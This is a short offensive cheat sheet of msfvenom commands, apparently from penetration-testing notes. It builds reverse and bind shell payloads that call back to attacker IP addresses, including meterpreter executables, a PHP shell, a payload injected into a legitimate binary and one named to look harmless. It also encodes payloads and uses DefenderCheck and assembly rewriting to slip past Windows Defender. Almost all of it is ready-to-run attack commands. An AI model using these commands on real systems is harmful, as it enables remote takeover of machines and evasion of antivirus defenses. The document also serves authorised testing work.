msfvenom -p [payload] -f [format] LHOST=[yourip] LPORT=[yourlistenerport]
msfvenom -p generic/shell_bind_tcp RHOST=<RemoteIPAddress> LPORT=<LocalPort> -f elf > term.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.30 -f exe -o notavirus.exe
msfvenom -p php/meterpreter_reverse_tcp LHOST=10.10.14.39 LPORT=8081 -f raw > new.php
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS/IP/VPSIP} LPORT={PORT/ForwardedPORT} -f exe > example.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=9090 -e x86/shikata_ga_nai -i 8 -f c > shell.c
# Read all options for a payload
msfvenom -p linux/x86/exec --list-options
DefenderCheck.exe .\mimikatz.exe
For a more advanced approach we can disassemble the raw payload and ghostwrite it:
ruby disassemble.rb payload.raw > payload.asm
# Editing the asm for fun and profit [...]
ruby peencode.rb payload.asm -o payload.exe
Windows Defender is a formidable adversary. We can use tools such as DefenderCheck.exe to test a binary against its checks before attempting to bypass them.